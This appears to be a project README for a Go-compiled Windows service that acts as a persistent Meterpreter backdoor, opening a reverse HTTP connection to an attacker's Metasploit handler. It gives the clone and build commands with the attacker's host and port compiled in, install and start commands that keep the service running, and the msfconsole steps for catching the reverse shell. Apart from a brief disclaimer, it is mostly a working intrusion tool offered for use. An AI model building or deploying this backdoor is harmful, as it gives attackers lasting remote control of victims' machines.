😇 A PowerShell exploit service that opens a reverse HTTP connection via Meterpreter

Powershell Reverse Http

Note: Use this program at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authorization.

Meterpreter-like backdoors are a pretty common attack vector and most decent antiviruses detect this behavior as a virus.

A simple Windows service running in the background that connects to a Meterpreter session via HTTP.

Usage

First, you need Go to build the binary (duh!) and metasploit-framework to accept the reverse connection:

git clone https://github.com/mauri870/powershell-reverse-http.git
cd powershell-reverse-http
env GOOS=windows go build -ldflags "-X main.LHOST=10.10.10.2 -X main.LPORT=3000" -o powershell-reverse.exe

Change LPORT and LHOST to match your Metasploit handler.

Usage

powershell-reverse.exe
no command specified

usage: powershell-reverse.exe <command>
       where <command> is one of
       install, remove, debug, start, stop, restart, pause or continue.

After install and start, the service is always up and trying to connect to the host and port specified in exploit.go.

On the attacker's machine:

./msfconsole --quiet
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST YOUR_IP_ADDRESS_HERE
LHOST => YOUR_IP_ADDRESS_HERE
msf exploit(handler) > set LPORT YOUR_PORT_TO_AWAIT_CONNECTION_HERE
LPORT => YOUR_PORT_TO_AWAIT_CONNECTION_HERE
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://LHOST:LPORT
[*] Starting the payload handler... 
